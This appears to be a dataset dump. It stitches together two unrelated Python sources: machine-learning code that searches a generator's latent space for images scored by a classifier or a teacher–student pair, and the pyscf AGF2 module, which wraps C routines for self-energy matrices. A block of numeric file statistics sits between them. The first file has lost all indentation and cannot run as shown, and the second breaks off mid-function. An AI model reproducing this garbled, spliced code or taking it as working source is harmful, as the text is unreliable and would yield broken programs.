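# --- Sketch (assumption: illustrative only) --------------------------------
# `loss` converts raw classifier outputs to a softmax and measures the squared
# distance to the one-hot target, so confidently-correct logits score near 0
# and confidently-wrong logits score near 2.
def _loss_demo():
    confident_correct = np.array([8.] + [0.] * 9)
    confident_wrong = np.array([0., 8.] + [0.] * 8)
    return loss(confident_correct, None, 0), loss(confident_wrong, None, 0)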
def optimize_to_grayscale(classifier, generator, batch_size = 64, encoding_size = 128):
batch = []
n_iter = batch_size
for i in range(n_iter):
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .9 and x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().cuda())
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum((1,), keepdim = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
c = softmaxes[indexes[0]][label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
def optimize_rescale(classifier, generator, batch_size = 16):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 512
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (20, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .90 and x < 3:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float())
images = torch.nn.functional.interpolate(images, size = 224)
# multipliers = [.2126, .7152, .0722]
# multipliers = np.expand_dims(multipliers, 0)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.tile(multipliers, [1, 1, 32, 32])
# multipliers = torch.Tensor(multipliers).to(device)
# images = images * multipliers
# images = images.sum(axis = 1, keepdims = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
])
c = softmaxes[indexes[0]][label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
def optimize(classifier, generator, batch_size = 64):
batch = []
n_iter = batch_size
encoding_size = 256
if 'sngan' in str(type(generator)):
encoding_size = 128
for i in range(n_iter):
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .9 and x < 300:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
# multipliers = [.2126, .7152, .0722]
# multipliers = np.expand_dims(multipliers, 0)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.tile(multipliers, [1, 1, 32, 32])
# multipliers = torch.Tensor(multipliers).to(device)
# images = images * multipliers
# images = images.sum(axis = 1, keepdims = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
c = softmaxes[indexes[0]].numpy()
c = c[label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
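# --- Sketch (assumption: a summary helper, not called by the code above) ---
# Each of the optimize_* loops performs the same evolutionary step: score every
# latent specimen, keep the 10 best (lowest loss), and refill the population by
# perturbing the survivors with Gaussian noise.
def _evolve_one_step(specimens, score_fn, n_keep=10, scale=0.5):
    losses = [score_fn(s) for s in specimens]
    survivors = specimens[np.argsort(losses)[:n_keep]]
    return np.concatenate([
        survivors,
        survivors + np.random.normal(scale=scale, size=survivors.shape),
        survivors + np.random.normal(scale=scale, size=survivors.shape),
    ])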
def discrepancy_loss(teacher_predictions, student_predictions):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return -np.sum(np.square(teacher_softmax - student_softmax))
def optimize_discrepancies(teacher, student, generator, batch_size = 16):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
while x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
discrepancy_loss(np.array(s), np.array(i))
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
return torch.cat(batch, axis = 0)
def discrepancy_loss_kl(teacher_predictions, student_predictions):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return -np.sum(teacher_softmax * (np.log(teacher_softmax) - np.log(student_softmax)))
def optimize_discrepancies_kl(teacher, student, generator, batch_size = 64):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
while x < 50:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
discrepancy_loss_kl(np.array(s), np.array(i))
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
print('image')
return torch.cat(batch, axis = 0)
def loss(softmax, image, label):
softmax = np.exp(softmax) / np.sum(np.exp(softmax))
return np.sum(np.power(
softmax -
np.eye(10)[label],
2
))
def optimize_discrepancies_(teacher, student, generator, batch_size = 64):
encoding_size = 128
batch_size = 16
with torch.no_grad():
specimens = torch.tensor(
np.random.uniform(-3.3, 3.3, size = (batch_size, 30, encoding_size))
).float().to(setup.device)
for _ in range(10):
images = generator(specimens.view(-1, encoding_size))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = torch.softmax(
teacher(images), axis = -1
).detach().cpu()
student_predictions = torch.softmax(
student(images), axis = -1
).detach().cpu()
losses = -1. * torch.pow(
teacher_predictions - student_predictions, 2
).sum(-1).view(batch_size, 30)
indexes = torch.argsort(losses) < 10
specimens = specimens[indexes].view(batch_size, 10, encoding_size)
specimens = torch.cat((
specimens,
specimens + torch.randn(batch_size, 10, encoding_size).to(setup.device),
specimens + torch.randn(batch_size, 10, encoding_size).to(setup.device),
), axis = 1)
images = generator(specimens.view(-1, encoding_size))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = torch.softmax(
teacher(images), axis = -1
).detach().cpu()
student_predictions = torch.softmax(
student(images), axis = -1
).detach().cpu()
losses = -1. * torch.pow(
teacher_predictions - student_predictions, 2
).sum(-1).view(batch_size, 30)
indexes = torch.argsort(losses) < 1
images = images.view(batch_size, 30, 1, 32, 32)[indexes]
return images
def curriculum_loss(teacher_predictions, student_predictions, label, weight):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return (
np.sum(np.square(teacher_softmax - label)) -
weight * np.sum(np.square(teacher_softmax - student_softmax))
)
def optimize_curriculum(teacher, student, generator, epoch, batch_size = 16):
batch = []
weights = [0.] * 4 + list(np.linspace(0, 1., 46)) + [1.] * 200
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
label = np.eye(10)[np.random.randint(10)]
while x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().cuda())
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
curriculum_loss(np.array(s), np.array(i), label, weights[epoch])
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
return torch.cat(batch, axis = 0)
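# --- Sketch (assumption: illustrative only) --------------------------------
# The curriculum weight used above stays at 0 for the first 4 epochs, ramps
# linearly to 1 over the next 46 epochs, and then stays at 1.
def _curriculum_weight(epoch):
    weights = [0.] * 4 + list(np.linspace(0, 1., 46)) + [1.] * 200
    return weights[epoch]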
| 39.625
| 88
| 0.549299
| 1,617
| 14,899
| 4.958565
| 0.074212
| 0.047892
| 0.056872
| 0.068845
| 0.9223
| 0.906086
| 0.90434
| 0.896732
| 0.874158
| 0.8668
| 0
| 0.0434
| 0.331901
| 14,899
| 375
| 89
| 39.730667
| 0.762106
| 0.049466
| 0
| 0.799373
| 0
| 0
| 0.000707
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037618
| false
| 0
| 0.009404
| 0
| 0.08464
| 0.003135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 | f4629fa1cbf96ac21825df8acee9f4b3adc7d0eb | 18,199 | py | Python | pyscf/agf2/_agf2.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [ "Apache-2.0" ] | 501 | 2018-12-06T23:48:17.000Z | 2022-03-31T11:53:18.000Z | pyscf/agf2/_agf2.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [ "Apache-2.0" ] | 710 | 2018-11-26T22:04:52.000Z | 2022-03-30T03:53:12.000Z | pyscf/agf2/_agf2.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [ "Apache-2.0" ] | 273 | 2018-11-26T10:10:24.000Z | 2022-03-30T12:25:28.000Z |
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Oliver J. Backhouse <olbackhouse@gmail.com>
# Alejandro Santana-Bonilla <alejandro.santana_bonilla@kcl.ac.uk>
# George H. Booth <george.booth@kcl.ac.uk>
#
import numpy as np
import ctypes
from pyscf import lib
from pyscf.agf2 import mpi_helper
libagf2 = lib.load_library('libagf2')
def cholesky_build(vv, vev, eps=1e-16):
''' Constructs the truncated auxiliaries from :attr:`vv` and :attr:`vev`.
Performs a Cholesky decomposition via :func:`numpy.linalg.cholesky`,
for a positive-definite or positive-semidefinite matrix. For the
latter, the null space is removed.
The :attr:`vv` matrix of :func:`build_se_part` can be positive-
semidefinite when :attr:`gf_occ.naux` < :attr:`gf_occ.nphys` for
the occupied self-energy, or :attr:`gf_vir.naux` < :attr:`gf_vir.nphys`
for the virtual self-energy.
'''
nmo = vv.shape[0]
try:
b = np.linalg.cholesky(vv).T
except np.linalg.LinAlgError:
w, v = np.linalg.eigh(vv)
w[w < eps] = eps
vv_posdef = np.dot(np.dot(v, np.diag(w)), v.T.conj())
b = np.linalg.cholesky(vv_posdef).T
b_inv = np.linalg.inv(b)
m = np.dot(np.dot(b_inv.T, vev), b_inv)
e, c = np.linalg.eigh(m)
c = np.dot(b.T, c[:nmo])
return e, c
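# --- Sketch (assumption: illustrative only, not part of the original module) ---
# A small positive-semidefinite vv (rank-deficient on purpose) and a matching
# energy-weighted vev, passed through cholesky_build to exercise the eigh
# fallback documented above and recover truncated auxiliary energies/couplings.
def _cholesky_build_demo():
    rng = np.random.default_rng(0)
    v = rng.standard_normal((6, 4))        # 6 physical orbitals, 4 auxiliaries
    e_aux = rng.standard_normal(4)
    vv = np.dot(v, v.T)                    # positive-semidefinite overlap
    vev = np.dot(v * e_aux[None], v.T)     # energy-weighted counterpart
    return cholesky_build(vv, vev)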
def build_mats_ragf2_incore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wraps AGF2ee_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2ee_vv_vev_islice')
assert qeri.ndim == 4
nmo = qeri.shape[0]
nocc = e_occ.size
nvir = e_vir.size
qeri = np.asarray(qeri, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * nocc // size
iend = nocc if rank == (size-1) else (rank+1) * nocc // size
fdrv(qeri.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_ragf2_outcore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2ee_vv_vev_islice to support outcore
'''
assert qeri.ndim == 4
nmo = qeri.shape[0]
nocc = e_occ.size
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fpos = os_factor + ss_factor
fneg = -ss_factor
eja = lib.direct_sum('j,a->ja', e_occ, -e_vir)
eja = eja.ravel()
for i in mpi_helper.nrange(nocc):
xija = qeri[:,i].reshape(nmo, -1)
xjia = qeri[:,:,i].reshape(nmo, -1)
eija = eja + e_occ[i]
vv = lib.dot(xija, xija.T, alpha=fpos, beta=1, c=vv)
vv = lib.dot(xija, xjia.T, alpha=fneg, beta=1, c=vv)
exija = xija * eija[None]
vev = lib.dot(exija, xija.T, alpha=fpos, beta=1, c=vev)
vev = lib.dot(exija, xjia.T, alpha=fneg, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
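# --- Sketch (assumption: illustrative only, not part of the original module) ---
# Shape contract shared by the two ragf2 builders above: qeri holds the
# (x i | j a) MO integrals and both builders return a pair of nmo x nmo
# matrices (vv, vev).
def _ragf2_builder_demo(nmo=8, nocc=3, nvir=5):
    rng = np.random.default_rng(1)
    qeri = rng.standard_normal((nmo, nocc, nocc, nvir))
    e_occ = -rng.random(nocc)
    e_vir = rng.random(nvir)
    vv, vev = build_mats_ragf2_outcore(qeri, e_occ, e_vir)
    assert vv.shape == vev.shape == (nmo, nmo)
    return vv, vev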
def build_mats_dfragf2_incore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2df_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2df_vv_vev_islice')
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
qxi = np.asarray(qxi, order='C')
qja = np.asarray(qja, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
rank, size = mpi_helper.rank, mpi_helper.size
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
start = rank * nocc // size
end = nocc if rank == (size-1) else (rank+1) * nocc // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfragf2_lowmem(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2df_vv_vev_islice_lowmem
'''
fdrv = getattr(libagf2, 'AGF2df_vv_vev_islice_lowmem')
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
qxi = np.asarray(qxi, order='C')
qja = np.asarray(qja, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
rank, size = mpi_helper.rank, mpi_helper.size
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
start = rank * (nocc * nocc) // size
end = nocc*nocc if rank == (size-1) else (rank+1) * (nocc*nocc) // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfragf2_outcore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2df_vv_vev_islice to support outcore
'''
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fpos = os_factor + ss_factor
fneg = -ss_factor
eja = lib.direct_sum('j,a->ja', e_occ, -e_vir)
eja = eja.ravel()
buf = (np.zeros((nmo, nocc*nvir)), np.zeros((nmo*nocc, nvir)))
for i in mpi_helper.nrange(nocc):
qx = qxi.reshape(naux, nmo, nocc)[:,:,i]
xija = lib.dot(qx.T, qja, c=buf[0])
xjia = lib.dot(qxi.T, qja[:,i*nvir:(i+1)*nvir], c=buf[1])
xjia = xjia.reshape(nmo, nocc*nvir)
eija = eja + e_occ[i]
vv = lib.dot(xija, xija.T, alpha=fpos, beta=1, c=vv)
vv = lib.dot(xija, xjia.T, alpha=fneg, beta=1, c=vv)
exija = xija * eija[None]
vev = lib.dot(exija, xija.T, alpha=fpos, beta=1, c=vev)
vev = lib.dot(exija, xjia.T, alpha=fneg, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
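# --- Sketch (assumption: illustrative only, not part of the original module) ---
# Same contract for the density-fitted builders: qxi and qja are 3-index
# integrals flattened to (naux, nmo*nocc) and (naux, nocc*nvir).
def _dfragf2_builder_demo(nmo=8, nocc=3, nvir=5, naux=20):
    rng = np.random.default_rng(2)
    qxi = rng.standard_normal((naux, nmo * nocc))
    qja = rng.standard_normal((naux, nocc * nvir))
    e_occ = -rng.random(nocc)
    e_vir = rng.random(nvir)
    return build_mats_dfragf2_outcore(qxi, qja, e_occ, e_vir)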
def build_mats_uagf2_incore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wraps AGF2uee_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2uee_vv_vev_islice')
assert qeri[0].ndim == qeri[1].ndim == 4
nmo = qeri[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
qeri_a = np.asarray(qeri[0], order='C')
qeri_b = np.asarray(qeri[1], order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * noa // size
iend = noa if rank == (size-1) else (rank+1) * noa // size
fdrv(qeri_a.ctypes.data_as(ctypes.c_void_p),
qeri_b.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_uagf2_outcore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2uee_vv_vev_islice to support outcore
'''
assert qeri[0].ndim == qeri[1].ndim == 4
nmo = qeri[0].shape[0]
# noa, nob = e_occ[0].size, e_occ[1].size
# nva, nvb = e_vir[0].size, e_vir[1].size
noa = e_occ[0].size
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fposa = ss_factor
fnega = -ss_factor
fposb = os_factor
eja_a = lib.direct_sum('j,a->ja', e_occ[0], -e_vir[0]).ravel()
eja_b = lib.direct_sum('j,a->ja', e_occ[1], -e_vir[1]).ravel()
for i in mpi_helper.nrange(noa):
xija_aa = qeri[0][:,i].reshape(nmo, -1)
xija_ab = qeri[1][:,i].reshape(nmo, -1)
xjia_aa = qeri[0][:,:,i].reshape(nmo, -1)
eija_aa = eja_a + e_occ[0][i]
eija_ab = eja_b + e_occ[0][i]
vv = lib.dot(xija_aa, xija_aa.T, alpha=fposa, beta=1, c=vv)
vv = lib.dot(xija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vv)
vv = lib.dot(xija_ab, xija_ab.T, alpha=fposb, beta=1, c=vv)
exija_aa = xija_aa * eija_aa[None]
exija_ab = xija_ab * eija_ab[None]
vev = lib.dot(exija_aa, xija_aa.T, alpha=fposa, beta=1, c=vev)
vev = lib.dot(exija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vev)
vev = lib.dot(exija_ab, xija_ab.T, alpha=fposb, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_incore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2udf_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2udf_vv_vev_islice')
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
qxi = np.asarray(qxi_a, order='C')
qja = np.asarray(qja_a, order='C')
qJA = np.asarray(qja_b, order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * noa // size
iend = noa if rank == (size-1) else (rank+1) * noa // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
qJA.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(naux),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_lowmem(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2udf_vv_vev_islice_lowmem
'''
fdrv = getattr(libagf2, 'AGF2udf_vv_vev_islice_lowmem')
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
qxi = np.asarray(qxi_a, order='C')
qja = np.asarray(qja_a, order='C')
qJA = np.asarray(qja_b, order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
nomax = max(noa, nob)
start = rank * (noa*nomax) // size
end = (noa*nomax) if rank == (size-1) else (rank+1) * (noa*nomax) // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
qJA.ctypes.data_as(ctypes.c_void_p),
